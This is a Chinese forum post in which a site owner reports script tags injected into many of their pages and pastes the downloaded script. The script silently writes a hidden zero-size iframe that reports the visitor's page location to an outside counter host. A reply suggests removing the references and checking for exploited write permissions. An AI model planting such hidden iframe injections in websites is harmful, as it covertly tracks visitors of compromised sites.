好多网页中都有<script language="javascript" src="http://css2.viens.la/css.js?width=700&height=600&keyword=uf556"></script>
<script language="javascript" src="http://office2.viens.la/office.js?do=list&uid=193&type=blog"></script>
这两段代码
我将两个js下载下来后发现两个js内容一样如下:
var cookA = new String(document.cookie);
var Then = new Date();
var cookName = '9B4A4C5EBF042C02' ;
Then.setTime(Then.getTime() + 30*60*1000 );
var kesor = cookA.indexOf(cookName);
if (kesor == -1)
{
document.write('');
document.write('<IFRAME marginWidth=0 marginHeight=0 src="http://count27.51yes.com/sa.aspx?id=275666147&
refe='+window.parent.location+'&location=http%3A//office.js/&color=32x&resolution=1024x768&returning=0&
language=zh-cn&ua=Mozilla/4.0%20%28compatible%3B%20MSIE%206.0%3B%20Windows%20NT%205.1%3B%20SV1%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.0.04506.30%29" frameBorder=0 width=0 scrolling=no height=0></IFRAME>');
document.cookie = "A1="+ cookName +";expires="+ Then.toGMTString() +";path=/";
}
请高手帮忙
先把这些页面中的那个引用删除,之后查找漏洞。尤其是写权限是不是被利用
xuexixuexi...